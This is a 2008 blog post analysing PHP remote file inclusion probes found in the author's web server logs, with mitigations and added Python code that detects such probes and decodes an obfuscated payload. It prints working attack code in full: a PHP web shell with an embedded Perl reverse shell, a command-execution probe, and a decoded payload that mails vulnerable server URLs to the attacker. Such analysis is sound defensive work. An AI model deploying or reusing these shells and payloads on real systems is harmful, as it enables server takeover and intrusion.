* endellion.me.uk


(Some Jerks are) Testing for Web Server Vulnerabilities

A lot of scripts are being let loose on the webserver at the moment. Here is a selection from the web logs...

(For a list of all recent attacks on the server go look here.)

 

1. AppServ

91.193.130.36 - - [28/Jan/2008:13:10:52 +0000] "GET /appserv/main.php?appserv_root=http://212.78.204.20/retiredgod/a.txt?& HTTP/1.1" 404 338 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

A quick look at the webserver at 212.78.204.20 shows that the directory retiredgod contains two files: a.txt and t.txt. The below is a.txt. The request is a remote file inclusion attempt: appserv_root is handed a URL instead of a local path, and the trailing ? makes whatever main.php appends to it land in the query string of the attacker's URL, so the fetch still hits a.txt. Had the customer at valueserver.de had any success with that, this is what would have come back, and it is just a marker: the scanner looks for it in the response to tell a vulnerable host from a miss. Here the request got a 404, so there was no main.php to include anything.

<title>Vulner4bl3</title>        
VulnerabLe

And with this success obtained, no doubt t.txt would have been let loose. It is a PHP web shell, and a seriously long bit of code:

<?
error_reporting(0);
/* Loader'z WEB Shell v 0.1 {14 ????? 2005}
??? ?????? ?????? ???????. ??? ????? ?? ???????????? ???????.
- ?????? ? ???????? ???????? ? ???????? PHP. ? ??????? ??????? ???????????? ?????????? ??????? ????.
- ???????? ? ?????????????? ???????.
- ??????? ?????? ? ??????? ???????? ? ??????? HTTP.
- ??????? ?????? ? ?????? ????????? ?????.
- ?????????? ???????????? ?????? ??? ???????.
- ?????? ?????? ???????? ?????????? ??????????. ???????? ?? ??????? ??????? ?? ???? ???, ???? ??, ?? ?????? ??????? ?????????? ???????,
??? ????????, ? ??? ?? ????, ??? ?? ?????? ????????? ???????.
- ?????? ??????? ???????? ?? ???????????? ???? ???????.
- ???? ?????? ???????? ??? ??????????? ?? Windows, ?????? ?????????? ??? ?????????? ?????? ?????????????? ? win-1251.
- ???????????? ??????????? ?????? ????-????. ?? ?????? ??????? ???????? ????????? ? ???? ?? ??????? ????????? ??????.
Loader Pro-Hack.ru
*/
?>

<style type='text/css'>
html { overflow-x: auto }
BODY { font-family: Verdana, Tahoma, Arial, sans-serif; font-size: 11px; margin: 0px; padding: 0px; text-align: center; color: #c0c0c0;
background-color: #336699 }
TABLE, TR, TD { font-family: Verdana, Tahoma, Arial, sans-serif; font-size: 11px; color: #c0c0c0; background-color: #336699 }
BODY,TD {FONT-SIZE: 13px; FONT-FAMILY: verdana, arial, helvetica;}
A:link {COLOR: #666666; TEXT-DECORATION: none}
A:active {COLOR: #666666; TEXT-DECORATION: none;}
A:visited {COLOR: #666666; TEXT-DECORATION: none;}
A:hover {COLOR: #999999; TEXT-DECORATION: none;}
BODY {
SCROLLBAR-FACE-COLOR: #DCE7EF;
SCROLLBAR-HIGHLIGHT-COLOR: #dbdbdb;
SCROLLBAR-SHADOW-COLOR: #598BB6;
SCROLLBAR-3DLIGHT-COLOR: #598BB6;
SCROLLBAR-ARROW-COLOR: #598BB6;
SCROLLBAR-TRACK-COLOR: #F4FAFD;
SCROLLBAR-DARKSHADOW-COLOR: #dbdbdb;
background-color: #336699;
}

 

fieldset.search { padding: 6px; line-height: 150% }

label { cursor: pointer }

form { display: inline }

img { vertical-align: middle; border: 0px }

img.attach { padding: 2px; border: 2px outset #000033 }

#logostrip { padding: 0px; margin: 0px; background-color: #000000; border: 1px solid #CBAB78; }
#content { padding: 10px; margin: 10px; background-color: #000000; border: 1px solid #CBAB78; }
#logo { FONT-SIZE: 50px; }
</style>

<title>ZETHA WEB SHELL </title>

<table "width="100%" height=100% bgcolor="#336699">
<tr><td align="center" valign="top">

<table><tr><td>
<?php

$dir = $_POST['dir'];
$dir = stripslashes($dir);

$cmd = $_POST['cmd'];
$cmd = stripslashes($cmd);

$bind = "
#!/usr/bin/perl
use Socket;
\$host = \$ARGV[0];
\$port = \$ARGV[1];
\$proto = getprotobyname('tcp') || die shit;
socket(SERVER, PF_INET, SOCK_STREAM, \$proto) || die shit;
my \$target = inet_aton(\$host);
if (!connect(SERVER, pack 'SnA4x8', 2, \$port, \$target)) {
print shit;
}
if (!fork( )) {
open(STDIN,'>&SERVER');
open(STDOUT,'>&SERVER');
open(STDERR,'>&SERVER');
exec {'/bin/sh'} '-bash' ;
exit(0);
}
";
function decode($buffer){

return convert_cyr_string ($buffer, d, w);

}

 

/*??????????*/

/*????????? ??? ???????*/
$servsoft = $_SERVER['SERVER_SOFTWARE'];

if (ereg("Win32", $servsoft, $reg)){
$sertype = "winda";
}
else
{
$sertype = "other";}

 

echo $servsoft . "<br>";
chdir($dir);
echo "Total space " . (int)(disk_total_space(getcwd())/(1024*1024)) . "Mb " . "Free space " . (int)(disk_free_space(getcwd())/(1024*1024)) . "Mb <br>";

if ($sertype == "winda"){

ob_start('decode');
echo "Version: ";
echo passthru("ver") . "<br><br>";
ob_end_flush();
}

if ($sertype == "other"){
echo "id:";
echo passthru("id") . "<br>";
echo "uname:";
echo passthru("uname -a") . "<br><br>";
echo "uptime:";
echo passthru("uptime") . "<br><br>";
}

 

if($_POST['post'] == "yes" and $HTTP_POST_FILES["userfile"][name] !== "")
{
copy($HTTP_POST_FILES["userfile"]["tmp_name"],$HTTP_POST_FILES["userfile"]["name"]);
}

if(($_POST['fileto'] != "")||($_POST['filefrom'] != ""))

{
$data = implode("", file($_POST['filefrom']));
$fp = fopen($_POST['fileto'], "wb");
fputs($fp, $data);
$ok = fclose($fp);
if($ok)
{
$size = filesize($_POST['fileto'])/1024;
$sizef = sprintf("%.2f", $size);
print "<center><div id=logostrip>Download - OK. (".$sizef."??)</div></center>";
}
else
{
print "<center><div id=logostrip>Something is wrong. Download - IS NOT OK</div></center>";
}
}

if ($_POST['installbind']){

if (is_dir($_POST['installpath']) == true){
chdir($_POST['installpath']);
$_POST['installpath'] = "temp.pl";}

$fp = fopen($_POST['installpath'], "w");
fwrite($fp, $bind);
fclose($fp);

exec("perl $installpath $ip $cbport");
chdir($dir);

}

if ($_POST['editfile']){
$fp = fopen($_POST['editfile'], "r");
$filearr = file($_POST['editfile']);

foreach ($filearr as $string){
$string = str_replace("<" , "&lt;" , $string);
$string = str_replace(">" , "&gt;" , $string);
$content = $content . $string;
}

echo "<center><div id=logostrip>Edit file: $editfile </div><form action=\"$REQUEST_URI\" method=\"POST\"><textarea name=content cols=122
rows=20>$content</textarea>
<input type=\"hidden\" name=\"dir\" value=\"" . getcwd() ."\">
<input type=\"hidden\" name=\"savefile\" value=\"{$_POST['editfile']}\"><br>
<input type=\"submit\" name=\"submit\" value=\"Save\"></form></center>";
fclose($fp);
}

if($_POST['savefile']){

$fp = fopen($_POST['savefile'], "w");
$content = stripslashes($content);
fwrite($fp, $content);
fclose($fp);
echo "<center><div id=logostrip>Successfully saved!</div></center>";

}

if ($cmd){

echo "<center><textarea cols=122 rows=20>";
if($sertype == "winda"){
ob_start('decode');
passthru($cmd);
ob_end_flush();}
else{
passthru($cmd);
}

echo "</textarea></center>";

}else{
$arr = array();

$arr = array_merge($arr, glob("*"));
$arr = array_merge($arr, glob(".*"));
$arr = array_merge($arr, glob("*.*"));
$arr = array_unique($arr);
sort($arr);
echo "<table><tr><td>Name</td><td>Type</td><td>Size</td><td>Last access</td><td>Last change</td><td>Perms</td><td>Write</td><td>Read</td></tr>";

foreach ($arr as $filename) {

if ($filename != "." and $filename != ".."){

if (is_dir($filename) == true){
$directory = "";
$directory = $directory . "<tr><td>$filename</td><td>" . filetype($filename) . "</td><td></td><td>" . date("G:i j M Y",fileatime($filename)) .
"</td><td>" . date("G:i j M Y",filemtime($filename)) . "</td><td>" . fileperms($filename);
if (is_writable($filename) == true){
$directory = $directory . "<td>Yes</td>";}
else{
$directory = $directory . "<td>No</td>";

}

if (is_readable($filename) == true){
$directory = $directory . "<td>Yes</td>";}
else{
$directory = $directory . "<td>No</td>";
}
$dires = $dires . $directory;
}

if (is_file($filename) == true){
$file = "";
$file = $file . "<tr><td>$filename</td><td>" . filetype($filename) . "</td><td>" . filesize($filename) . "</td><td>" . date("G:i j M
Y",fileatime($filename)) . "</td><td>" . date("G:i j M Y",filemtime($filename)) . "</td><td>" . fileperms($filename);
if (is_writable($filename) == true){
$file = $file . "<td>Yes</td>";}
else{
$file = $file . "<td>No</td>";
}

if (is_readable($filename) == true){
$file = $file . "<td>Yes</td></td></tr>";}
else{
$file = $file . "<td>No</td></td></tr>";
}
$files = $files . $file;
}

 

}

 

}
echo $dires;
echo $files;
echo "</table><br>";
}

 

echo "
<form action=\"$REQUEST_URI\" method=\"POST\">
Command:<INPUT type=\"text\" name=\"cmd\" size=30 value=\"$cmd\">

Directory:<INPUT type=\"text\" name=\"dir\" size=30 value=\"";

echo getcwd();
echo "\">
<INPUT type=\"submit\" value=\"Do it\"></form>";

 

if (ini_get('safe_mode') == 1){echo "<br><font size=\"3\"color=\"#cc0000\"><b>SAFE MOD IS ON<br>
Including from here: "
. ini_get('safe_mode_include_dir') . "<br>Exec here: " . ini_get('safe_mode_exec_dir'). "</b></font>";}

 

 

 

echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
Download here <b>from</b>:
<INPUT type=\"text\" name=\"filefrom\" size=30 value=\"http://\">
<b>into:</b>
<INPUT type=\"text\" name=\"fileto\" size=30>
<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\">
<INPUT type=\"submit\" value=\"Download\"></form></div>";

echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
<INPUT type=\"file\" name=\"userfile\">
<INPUT type=\"hidden\" name=\"post\" value=\"yes\">
<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\">
<INPUT type=\"submit\" value=\"Download\"></form></div>";

 

echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\">
Install cb
<b>Temp path</b><input type=\"text\" name=\"installpath\" value=\"" . getcwd() . "\">
<b>Ip</b><input type=\"text\" name=\"ip\" value=\"ip\">
<b>Port</b><input type=\"text\" name=\"cbport\" value=\"3333\">

<INPUT type=\"hidden\" name=\"installbind\" value=\"yes\">
<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\">
<INPUT type=\"submit\" value=\"Install\"></form></div>";

echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\">
File to edit:
<input type=\"text\" name=\"editfile\" >
<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() ."\">
<INPUT type=\"submit\" value=\"Edit\"></form></div>";

 

?>
</td></tr></table>

</td></tr>
<tr valign="BOTTOM">
<td valign=bottom><center>
Coded by Loader and Modify By Zetha
</center></td>
</tr>
</table>

pro-hack.ru huh? The application this is targeting has an /appserv/ directory which contains a vulnerable php script by the looks of it: main.php takes the appserv_root parameter straight from the request and uses it in an include without checking it, which is why feeding it a URL pulls in code from elsewhere. My thinking here is this might be related to AppServ...

From the website: ( http://www.appservnetwork.com/modules.php?name=Content&pa=showpage&pid=7 )

AppServ the begining.
AppServ is not support by Thai Goverment or Corporation but this program was inspire by Phanupong Panyadee (AppServ Foundation). Concept of AppServ it is Easy to install Apache, PHP, MySQL in 1 minute. Many people in this world have problem when Install Apache, PHP, MySQL becuase use long time to configure and some time can make dizzy. First time of distribution provide on October 9, 2001. Many people use AppServ and growing up everywhere in this world. Right now AppServ website provide in Thai and English language. For the future AppServ wet site will provide every languages on world.

My first language isn't English either, but this made me laugh a little. I want to go to the planet where people don't have any problem when install Apache. Bit of weirdness there as well: whilst they recommend Linux, the only download I can find is a Windows executable. Oh well. Maybe because you don't need this thing on Linux?

"Solution: Currently, there are no known upgrades, patches, or workarounds available to correct this issue."

(source: http://osvdb.org/22228 )

That's just brilliant. I am tempted to set this thing up to see what they would want to do given such access levels, but that would mean major reorganisation which I haven't got the time for at the moment.

Hang on, it just struck me that there must be a solution... The vulnerability is exploited through the script in the /appserv/ directory, and the AppServ website says you can delete that directory after installation. Deleting it removes main.php, and with it the include that can be pointed at a remote URL, so that would help. One more thing worth knowing, independent of AppServ: PHP will only include a remote file if allow_url_include is on (on PHP before 5.2, where that setting doesn't exist, it is allow_url_fopen that governs it); with it off, the request above fails whether or not main.php is still there.

Directory structure of www file store.
• www Directory Root for Web page file.
• www/cgi-bin CGI file directory.
• www/phpMyAdmin phpMyAdmin program directory.
• www/appserv AppServ file, you can delete it after install.
• www/index.php AppServ index.php file you can delete it after install.

 

2. php remote file inclusion via index.php?page= (or whatever this is)


72.55.143.52 - - [28/Jan/2008:11:59:52 +0000] "GET /index.php?page=http://www.pooya.info/images/.../test.txt??? HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"

Here we have the generic form of the same trick. index.php?page=... is the classic shape of a PHP remote file inclusion: a script does include() on whatever the page parameter holds, and the trailing ??? again pushes anything the script appends into the query string of the attacker's URL. This scheme is being tried in random directories on my server. All of them attempt to retrieve test.txt which reads: (and it's nowhere near as big as the last one)

<html><head><title>/\/\/\ Response CMD /\/\/\</title></head><body bgcolor=DC143C>
<H1>Changing this CMD will result in corrupt scanning !</H1>
</html></head></body>
<?php
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
echo("Safe Mode of this Server is : ");
echo("SafemodeOFF");
}
else{
ini_restore("safe_mode");
ini_restore("open_basedir");
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
echo("Safe Mode of this Server is : ");
echo("SafemodeOFF");
}else{
echo("Safe Mode of this Server is : ");
echo("SafemodeON");
}
}
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}
}
return $res;
}
exit;
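
Both of the requests logged above, the appserv_root one in section 1 and this page= one, have the same shape: a query parameter whose value is an absolute URL, usually ending in a stray ?. That is easy to pick out of an Apache log automatically. Here is a small Python script that does it. It is added here and is not part of the original post or of any of the scanners above. The first two log lines are the ones from this page; the third is a made-up benign request so there is something that should not be flagged.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Apache "combined" format: ip ident user [time] "METHOD target PROTO" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# A parameter value that is itself an absolute URL is the tell-tale of an RFI probe.
REMOTE_SCHEMES = ("http://", "https://", "ftp://")

SAMPLE_LOG = [
    # copied from section 1 of the post
    '91.193.130.36 - - [28/Jan/2008:13:10:52 +0000] "GET /appserv/main.php?appserv_root=http://212.78.204.20/retiredgod/a.txt?& HTTP/1.1" 404 338 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"',
    # copied from section 2 of the post
    '72.55.143.52 - - [28/Jan/2008:11:59:52 +0000] "GET /index.php?page=http://www.pooya.info/images/.../test.txt??? HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"',
    # constructed benign request, should not be flagged
    '203.0.113.7 - - [28/Jan/2008:12:00:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]


def parse_line(line):
    """Split one combined-format line into its fields, or return None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def remote_params(target):
    """Return (name, value) for every query parameter whose value is an absolute URL."""
    _path, _, query = target.partition("?")
    return [(name, value)
            for name, value in parse_qsl(query, keep_blank_values=True)
            if value.lower().startswith(REMOTE_SCHEMES)]


def scan(lines):
    """Run over log lines and describe each RFI probe found.

    suffix_trick is True when the injected URL ends in '?': whatever the vulnerable
    script appends to the parameter (a file name, an extension) then lands in the
    query string of the attacker's URL and the fetch still hits the attacker's file.
    """
    report = []
    for line in lines:
        fields = parse_line(line)
        if fields is None:
            continue
        for name, value in remote_params(fields["target"]):
            report.append({
                "src": fields["ip"],
                "path": fields["target"].partition("?")[0],
                "param": name,
                "remote_host": urlsplit(value).hostname,
                "suffix_trick": value.endswith("?"),
                "status": int(fields["status"]),
            })
    return report


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The status code is kept in the report on purpose: a 404 (as in both lines here) means the probe hit nothing, whereas a 200 against a script that really does include() its parameter is the one to chase, and remote_host tells you where the payload was hosted so it can be fetched and read, as done above.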

A quick peek at the pooya.info server shows the same directory has another file called response.txt:

<?php $_F=__FILE__;$_X='Pz48aHRtbD48aDUxZD48dDR0bDU+L1wvXC9cIFI1c3AybnM1IENNRCAvXC9cL1w8L3Q0dGw
1PjwvaDUxZD48YjJkeSBiZ2MybDJyPURDNnVvQz4NCjxINj5DaDFuZzRuZyB0aDRzIENNRCB3NGxsIHI1czNsdCA0biBjMn
JyM3B0IHNjMW5uNG5nICE8L0g2Pg0KPC9odG1sPjwvaDUxZD48L2IyZHk+DQo8P3BocA0KNGYoKEA1cjVnNCgiMzRkIiw1e
CgiNGQiKSkpIHx8IChANXI1ZzQoIlc0bmQyd3MiLDV4KCJuNXQgc3QxcnQiKSkpKXsNCjVjaDIoIlMxZjUgTTJkNSAyZiB0
aDRzIFM1cnY1ciA0cyA6ICIpOw0KNWNoMigiUzFmNU9GRiIpOw0KfQ0KNWxzNXsNCjRuNF9yNXN0MnI1KCJzMWY1X20yZDU
iKTsNCjRuNF9yNXN0MnI1KCIycDVuX2IxczVkNHIiKTsNCjRmKChANXI1ZzQoIjM0ZCIsNXgoIjRkIikpKSB8fCAoQDVyNW
c0KCJXNG5kMndzIiw1eCgibjV0IHN0MXJ0IikpKSl7DQo1Y2gyKCJTMWY1IE0yZDUgMmYgdGg0cyBTNXJ2NXIgNHMgOiAiK
TsNCjVjaDIoIlMxZjVPRkYiKTsNCn01bHM1ew0KNWNoMigiUzFmNSBNMmQ1IDJmIHRoNHMgUzVydjVyIDRzIDogIik7DQo1
Y2gyKCJTMWY1T04iKTsNCn0NCn0NCi8vMG85M3U0MDk2MzBqZjk1ajEwOTVmOG8wOTYwN3Vpcm8wODV5cWYzb2o2MDg5cmo
2MA0KJGZyMm0xZzUgPSAgIlA0dEIzbGwgQ3I1VyA8cDR0YjNsbGczeXNAMm5sNG41bTE0bC5jMm0+IjsvLzBvOTN1NDA5Nj
MwamY5NWoxMDk1ZjhvMDk2MDd1aXJvMDg1eXFmM29qNjA4OXJqNjANCiRqMTVudzQ1bTI1dGg1bWQxbjJudHYxbmc1bmg1I
D0gIjFkdjVudDNyNWNyMXp5ajFuQGdtMTRsLmMybSI7Ly8wbzkzdTQwOTYzMGpmOTVqMTA5NWY4bzA5NjA3dWlybzA4NXlx
ZjNvajYwODlyajYwDQokNW53NWxrMm5kNXJ3NXJwbTI1dGg1dGg1YmI1biA9ICJTdDFibDVTYzFubjVyIjsvLzBvOTN1NDA
5NjMwamY5NWoxMDk1ZjhvMDk2MDd1aXJvMDg1eXFmM29qNjA4OXJqNjANCiQ1bm4xdDMzcmw0amttMjV0NW53NWQ1M3Jsbj
Q1dHY1cmc1dDVuID0gImh0dHA6Ly8iLiRfU0VSVkVSWydTRVJWRVJfTkFNRSddLiRfU0VSVkVSWydSRVFVRVNUX1VSSSddO
y8vMG85M3U0MDk2MzBqZjk1ajEwOTVmOG8wOTYwN3Vpcm8wODV5cWYzb2o2MDg5cmo2MA0KJGg1dzVoNWJiNW4yMmtuMmc0
bmYyID0gIkZyMm06ICIuJGZyMm0xZzU7Ly8wbzkzdTQwOTYzMGpmOTVqMTA5NWY4bzA5NjA3dWlybzA4NXlxZjNvajYwODl
yajYwDQptMTRsKCRqMTVudzQ1bTI1dGg1bWQxbjJudHYxbmc1bmg1LCAkNW53NWxrMm5kNXJ3NXJwbTI1dGg1dGg1YmI1bi
wgJDVubjF0MzNybDRqa20yNXQ1bnc1ZDUzcmxuNDV0djVyZzV0NW4sICRoNXc1aDViYjVuMjJrbjJnNG5mMik7Ly8wbzkzd
TQwOTYzMGpmOTVqMTA5NWY4bzA5NjA3dWlybzA4NXlxZjNvajYwODlyajYwDQovLzBvOTN1NDA5NjMwamY5NWoxMDk1Zjhv
MDk2MDd1aXJvMDg1eXFmM29qNjA4OXJqNjANCmYzbmN0NDJuIDV4KCRjZjUpew0KJHI1cyA9ICcnOw0KNGYgKCE1bXB0eSg
kY2Y1KSl7DQo0ZihmM25jdDQybl81eDRzdHMoJzV4NWMnKSl7DQpANXg1YygkY2Y1LCRyNXMpOw0KJHI1cyA9IGoyNG4oIl
xuIiwkcjVzKTsNCn0NCjVsczU0ZihmM25jdDQybl81eDRzdHMoJ3NoNWxsXzV4NWMnKSl7DQokcjVzID0gQHNoNWxsXzV4N
WMoJGNmNSk7DQp9DQo1bHM1NGYoZjNuY3Q0Mm5fNXg0c3RzKCdzeXN0NW0nKSl7DQpAMmJfc3QxcnQoKTsNCkBzeXN0NW0o
JGNmNSk7DQokcjVzID0gQDJiX2c1dF9jMm50NW50cygpOw0KQDJiXzVuZF9jbDUxbigpOw0KfQ0KNWxzNTRmKGYzbmN0NDJ
uXzV4NHN0cygncDFzc3RocjMnKSl7DQpAMmJfc3QxcnQoKTsNCkBwMXNzdGhyMygkY2Y1KTsNCiRyNXMgPSBAMmJfZzV0X2
MybnQ1bnRzKCk7DQpAMmJfNW5kX2NsNTFuKCk7DQp9DQo1bHM1NGYoQDRzX3I1czIzcmM1KCRmID0gQHAycDVuKCRjZjUsI
nIiKSkpew0KJHI1cyA9ICIiOw0Kd2g0bDUoIUBmNTJmKCRmKSkgeyAkcjVzIC49IEBmcjUxZCgkZiw2MGF1KTsgfQ0KQHBj
bDJzNSgkZik7DQp9DQp9DQpyNXQzcm4gJHI1czsNCn0NCjV4NHQ7';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZ
GUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19G
SUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));?>

That's shown small because it's a load of garble just taking up space on the page. Base64-decoding the two strings, the long $_X and the short one handed to eval(), gives:

?><html><h51d><t4tl5>/\/\/\ R5sp2ns5 CMD /\/\/\</t4tl5></h51d><b2dy bgc2l2r=DC6uoC>
<H6>Ch1ng4ng th4s CMD w4ll r5s3lt 4n c2rr3pt sc1nn4ng !</H6>
</html></h51d></b2dy>
<?php
4f((@5r5g4("34d",5x("4d"))) || (@5r5g4("W4nd2ws",5x("n5t st1rt")))){
5ch2("S1f5 M2d5 2f th4s S5rv5r 4s : ");
5ch2("S1f5OFF");
}
5ls5{
4n4_r5st2r5("s1f5_m2d5");
4n4_r5st2r5("2p5n_b1s5d4r");
4f((@5r5g4("34d",5x("4d"))) || (@5r5g4("W4nd2ws",5x("n5t st1rt")))){
5ch2("S1f5 M2d5 2f th4s S5rv5r 4s : ");
5ch2("S1f5OFF");
}5ls5{
5ch2("S1f5 M2d5 2f th4s S5rv5r 4s : ");
5ch2("S1f5ON");
}
}
//0o93u409630jf95j1095f8o09607uiro085yqf3oj6089rj60
$fr2m1g5 = "P4tB3ll Cr5W <p4tb3llg3ys@2nl4n5m14l.c2m>";//0o93u409630jf95j1095f8o09607uiro085yqf3oj6089rj60
$j15nw45m25th5md1n2ntv1ng5nh5 = "1dv5nt3r5cr1zyj1n@gm14l.c2m";//0o93u409630jf95j1095f8o09607uiro085yqf3oj6089rj60
$5nw5lk2nd5rw5rpm25th5th5bb5n = "St1bl5Sc1nn5r";//0o93u409630jf95j1095f8o09607uiro085yqf3oj6089rj60
$5nn1t33rl4jkm25t5nw5d53rln45tv5rg5t5n = "http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];//0o93u409630jf95j1095f8o09607uiro085yqf3oj6089rj60
$h5w5h5bb5n22kn2g4nf2 = "Fr2m: ".$fr2m1g5;//0o93u409630jf95j1095f8o09607uiro085yqf3oj6089rj60
m14l($j15nw45m25th5md1n2ntv1ng5nh5, $5nw5lk2nd5rw5rpm25th5th5bb5n, $5nn1t33rl4jkm25t5nw5d53rln45tv5rg5t5n, $h5w5h5bb5n22kn2g4nf2);//0o93u409630jf95j1095f8o09607uiro085yqf3oj6089rj60
//0o93u409630jf95j1095f8o09607uiro085yqf3oj6089rj60
f3nct42n 5x($cf5){
$r5s = '';
4f (!5mpty($cf5)){
4f(f3nct42n_5x4sts('5x5c')){
@5x5c($cf5,$r5s);
$r5s = j24n("\n",$r5s);
}
5ls54f(f3nct42n_5x4sts('sh5ll_5x5c')){
$r5s = @sh5ll_5x5c($cf5);
}
5ls54f(f3nct42n_5x4sts('syst5m')){
@2b_st1rt();
@syst5m($cf5);
$r5s = @2b_g5t_c2nt5nts();
@2b_5nd_cl51n();
}
5ls54f(f3nct42n_5x4sts('p1ssthr3')){
@2b_st1rt();
@p1ssthr3($cf5);
$r5s = @2b_g5t_c2nt5nts();
@2b_5nd_cl51n();
}
5ls54f(@4s_r5s23rc5($f = @p2p5n($cf5,"r"))){
$r5s = "";
wh4l5(!@f52f($f)) { $r5s .= @fr51d($f,60au); }
@pcl2s5($f);
}
}
r5t3rn $r5s;
}
5x4t;

'$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=ereg_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;

That's nearly legible; only the decoder in the last line is left to apply. Note that strtr with two strings is a single-pass, character-for-character table, '123456aouie' to 'aouie123456', so it is not simply digits back to vowels: 1 to 5 become a, o, u, i, e, but 6 becomes 1, and a, o, u, i, e become 2, 3, 4, 5, 6. That is how 1024 ended up as 60au and DC143C as DC6uoC. ereg_replace then drops the real script path in for __FILE__ and eval() runs the result. Applying the table gives the following, which is test.txt plus a mail() call that sends the URL of the vulnerable server (SERVER_NAME and REQUEST_URI) to an address in the script; that's how the scanner collects its hits:

?><html><head><title>/\/\/\ Response CMD /\/\/\</title></head><body bgcolor=DC143C>
<H1>Changing this CMD will result in corrupt scanning !</H1>
</html></head></body>
<?php
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
echo("Safe Mode of this Server is : ");
echo("SafeOFF");
}
else{
ini_restore("safe_mode");
ini_restore("open_basedir");
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
echo("Safe Mode of this Server is : ");
echo("SafeOFF");
}else{
echo("Safe Mode of this Server is : ");
echo("SafeON");
}
}
//039u4i091u0jf9eja09ef830910745r308eyqfu3j1089rj10
$fromage = "PitBull CreW <pitbullguys@onlinemail.com>";//039u4i091u0jf9eja09ef830910745r308eyqfu3j1089rj10
$jaenwiemoethemdanontvangenhe = "adventurecrazyjan@gmail.com";//039u4i091u0jf9eja09ef830910745r308eyqfu3j1089rj10
$enwelkonderwerpmoethethebben = "StableScanner";//039u4i091u0jf9eja09ef830910745r308eyqfu3j1089rj10
$ennatuurlijkmoetenwedeurlnietvergeten = "http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];//039u4i091u0jf9eja09ef830910745r308eyqfu3j1089rj10
$hewehebbenooknoginfo = "From: ".$fromage;//039u4i091u0jf9eja09ef830910745r308eyqfu3j1089rj10
mail($jaenwiemoethemdanontvangenhe, $enwelkonderwerpmoethethebben, $ennatuurlijkmoetenwedeurlnietvergeten, $hewehebbenooknoginfo);//039u4i091u0jf9eja09ef830910745r308eyqfu3j1089rj10
//039u4i091u0jf9eja09ef830910745r308eyqfu3j1089rj10
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}
}
return $res;
}
exit;
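
For the record, here is that decoder redone in Python. It is an added example, not part of the post or of the scanner: it reproduces the strtr table both ways, decodes the first 28 base64 characters of $_X exactly as printed above, and checks the fragments where a one-way reading of the table goes wrong (60au is really 1024, DC6uoC is DC143C). The long $_X string itself is not repeated here; feed the whole of it to decode_payload() to get the full listing. The __FILE__ substitution is left out because this payload never reads __FILE__.

```python
import base64

# The two halves of the PHP call strtr($_X, '123456aouie', 'aouie123456').
# strtr with two strings is a per-character table applied in ONE pass, so the
# swap is two-way: 1..5 -> a o u i e, 6 -> 1, and a o u i e -> 2..6.
_FROM = "123456aouie"
_TO = "aouie123456"
DECODE_TABLE = str.maketrans(_FROM, _TO)
ENCODE_TABLE = str.maketrans(_TO, _FROM)   # inverse: what the scanner's author ran


def decode_strtr(text):
    """Undo the character swap (stage 2 of the decoder)."""
    return text.translate(DECODE_TABLE)


def encode_strtr(text):
    """Apply the swap, i.e. how the file was obfuscated in the first place."""
    return text.translate(ENCODE_TABLE)


def decode_payload(b64):
    """Stage 1 then stage 2, as the eval()'d one-liner does before its own eval().
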